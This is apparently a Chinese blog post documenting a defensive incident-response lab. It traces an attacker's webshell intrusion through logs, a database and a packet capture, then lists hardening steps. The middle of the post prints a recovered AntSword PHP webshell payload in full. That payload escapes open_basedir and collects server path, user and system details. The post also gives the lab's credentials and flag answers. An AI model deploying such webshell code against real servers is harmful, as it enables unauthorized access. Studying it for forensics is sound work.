知攻善防应急靶场-Linux(2)

本文主要是介绍知攻善防应急靶场-Linux(2)，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

前言：

堕落了三个月，现在因为被找实习而困扰，着实自己能力不足，从今天开始 每天沉淀一点点 ，准备秋招 加油

注意：

本文章参考qax的网络安全应急响应和知攻善防实验室靶场，记录自己的学习过程，还希望各位博主 师傅 大佬 勿喷，还希望大家指出错误

靶场前言： 

看监控的时候发现webshell告警，领导让你上机检查你可以救救安服仔吗！！

靶场要求： 

（1）提交攻击者IP
（2）提交攻击者修改的管理员密码(明文)
（3）提交第一次Webshell的连接URL
（4）提交Webshell连接密码
（5）提交数据包的flag1
（6）提交攻击者使用的后续上传的木马文件名称
（7）提交攻击者隐藏的flag2
（8）提交攻击者隐藏的flag3

过程： 

查看本机网卡

查询管理员最近登录情况命令 

 grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'

 根据对比本机IP可以得知该 192.168.20.1即为攻击者的IP，解决（1） 问题，然后照常检查系统有没有运行什么可疑的程序

发现mysql运行了， 这样的话我们就可以去找管理员密码了，目标就很明确了，先去获取数据库密码，然后在www目录的access.log发现路由phpmyadmin

那估计网站搭建数据库是使用了phpmyadmin ,那我们直接去找配置文件config.inc.php就可以

最终在/www/wwwroot/127.0.0.1/lib目录下找到了

得到数据库账号密码

kaoshi: 5Sx8mK5ieyLPb84m

然后登入数据库 查到id为1 的为管理员

寻找id为1 得到密码

 得到密码为加密的形式

f6f6eb5ace977d7e114377cc7098b7e3

解码得到：管理员密码（问题2）：Network@2020

我们在root目录下发现了一个 1.pcapng文件 那就的用wireshark进行分析了,直接过滤 攻击者ip  ip.addr == 192.168.20.1 然后就看到flag1路径 打开得到flag1(问题5) 

flag1{Network@_2020_Hack}

然后其他的数据流全是index.php?user-app-register和version2.php ，追踪得到

url解码得到PHP代码

Network2020=@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)) {continue;};$tmdir=$item."/.fd491f470fb7";@mkdir($tmdir);if(!@file_exists($tmdir)) {continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for ($i=0;$i<sizeof($cntarr);$i++) {@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};
}
;
;
function asenc($out) {return $out;
}
;
function asoutput() {$output=ob_get_contents();ob_end_clean();echo "4a0c"."dc70";echo @asenc($output);echo "db6"."da5";
}
ob_start();
try {$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}	";if(substr($D,0,1)!="/") {foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";} else {$R.="/";}$R.="	";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="	{$s}";echo $R;;
}
catch(Exception $e) {echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();

1. 代码混淆：该代码使用了一些混淆技术，如函数和变量名的简写、base64 编码和字符串拼接，以增加代码的复杂性和难以理解性。

2. 文件和目录操作：代码尝试获取脚本所在目录的路径，并在一系列目录中创建临时目录。它还尝试更改 PHP 的 open_basedir 设置，以限制脚本的访问权限。这些操作可能会导致安全风险，特别是对于共享主机环境。

3. 输出处理：代码使用 ob_start() 和 ob_get_contents() 函数来捕获输出内容，并通过 asenc() 函数进行处理。然后，它将处理后的输出进行拼接和输出。这种输出处理方式是不寻常的，目的和处理过程不清楚。

4. 系统信息泄露：代码通过调用 php_uname() 函数获取服务器的一些系统信息，如路径和当前用户。这种信息泄露可能会暴露系统的敏感信息。

5. 潜在的异常处理问题：代码使用了一个异常处理结构，但在异常发生时只是简单地输出了错误消息，并没有实际处理或记录异常。这可能导致问题的隐藏和难以调试。

那就得知了提交第一次Webshell的连接URL为（问题3）

index.php?user-app-register

根据 Network2020=@ini_set("display_errors", "0"); 就可以知道这段代码基本是所有WebShell客户端链接PHP类WebShell都有的一种代码，但是有的客户端会将这段编码或者加密，而蚁剑是明文，所以较好发现。

所以提交Webshell连接密码为（问题4）

Network2020

现在我们查看第二个数据包发现最后一行为可执行字符串

x0b6b31b98f31d=TtL3d3dy93d3dyb290LzEyNy4wLjAuMS8=

因为蚁剑会将参数进行base64编码，然后在最前面随机添加两个字母，所以想知道这个参数是什么应该对L3d3dy93d3dyb290LzEyNy4wLjAuMS8=进行base64解码，得到参数

好熟悉 之前咱们的数据库的数据也在这个目录下，那就可以得知攻击在/www/wwwroot/127.0.0.1/目录下创建了flag1 文件并写入flag，然后写入一个新的木马，再改名为version2.php，那么后续访问version2.php的流量包应该就是后续上传的木马文件了 那我们追踪version2.php

一眼冰蝎特征

参考https://www.freebuf.com/articles/network/345803.html

 

那就可以说明 version2.php就是攻击者后续上传的木马进行getshell了（问题6）

拿到shell了 我们就看看攻击者干了什么 输入 history

关闭防火墙

删除了flag1 和 version2.php 这就和前面的分析对上了

 

在隐藏目录.api下修改了2个php文件，且得到了flag3（问题8）

flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}

 那我们访问修改的php文件,在alinotify.php文件下得到flag2（问题7）

flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}

 

至此，所有任务全部完成

总结： 

以下总结为自己思考 ，可能存在某方面不全或者错误，水平有限，还请见谅

1.该攻击者的IP为192.168.20.1

2.攻击方式应该是通过/index.php?user-app-register上传了一个webshell,然后使用蚁剑管理webshell之后再次上传version2.php进行提权.

3.攻击者修改了phpmyadmin数据库的管理员密码

3.攻击者拿到权限之后 关闭了防火墙服务，并且删除了提权文件version2.php和flag1,并且修改了alinotify.php文件内容 

4.并没有发现攻击者留下后门

清除加固：

1.封禁攻击者IP

2.经过测验，发现攻击者可通过22端口进行ssh连接，应当更改ssh默认端口或者关闭ssh连接

3.修复更改后的文件且还原数据库里面管理员的密码

4.对上传的文件 或者字符串进行过滤处理

5.对传入的用户数据进行预编译处理＋手动过滤 防止sql注入泄露更改管理员密码

6.重启防火墙服务

7.关闭某些可以提权的shell函数

这篇关于知攻善防应急靶场-Linux(2)的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---